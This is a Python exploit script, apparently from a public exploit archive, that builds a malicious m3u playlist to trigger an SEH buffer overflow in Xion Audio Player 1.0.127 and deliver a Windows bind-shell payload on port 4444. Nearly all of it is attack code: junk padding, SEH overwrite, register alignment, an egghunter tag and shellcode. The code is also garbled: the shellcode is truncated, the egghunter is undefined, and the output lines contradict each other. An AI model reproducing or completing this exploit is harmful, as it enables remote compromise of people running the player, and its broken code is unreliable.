# Exploit Title: Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability
# Date: 11/23/2010
# Author: 0v3r
# Software Link: http://www.r2.com.au/downloads/files/xion_v1.0b127.exe
# Version: 1.0.127
# Tested on: Windows XP SP3 EN
# CVE: N/A
# encoded with alpha3 encoder by skylined
#win32_bind -EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
shellcode= ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x37\x49\x49"
junk= "A" * 221
nseh= "\x61" #popad
nseh += "\x6e" #nop/align
seh = "\x7b\x41"# POP POP RET
#fix eax to point to the egghunter
prepare= "\x6e" #nop/align
prepare += "\x05\x14\x11" #add eax,0x11001400
prepare += "\x6e" #nop/align
prepare += "\x2d\x13\x11" #sub eax,0x11001300
prepare += "\x6e" #nop/alignn
#jump to eax
jump= "\x50" #push eax
jump +="\x6e" #nop/align
jump += "\xc3" #retn
#align buffer to hit the egghunter
align = "D" * 112
#few junk before shellcode
preshell = "D" * 500
#the egghunters tag
egg = "w00tw00t"
#few more junk after our shellcode
#I noticed that the bigger the buffer the more reliable the exploit
postshell= "E" * (12000 - len(junk + nseh + seh + preshell + jump + align + egghunter + egg+ preshell + shellcode ))
#the final buffer
buff = junk + nseh + seh + prepare + jump + align + egghunter + preshell + egg + shellcode + postshell
f = open("exploit.m3u",'w')
print "\n"
print "\t-----------------------------------------------------------------"
print "\t| Xion Audio Player 1.0.127 (m3u) Buffer Overflow Vulnerability |"
print "\t-----------------------------------------------------------------"
print "\n"
print "\t- File successfully created..."
print "\t- To run exploit open the file exploit.m3u with Xion Audio Player...\n"
print "\t-Oooops! Can't write file ...\n"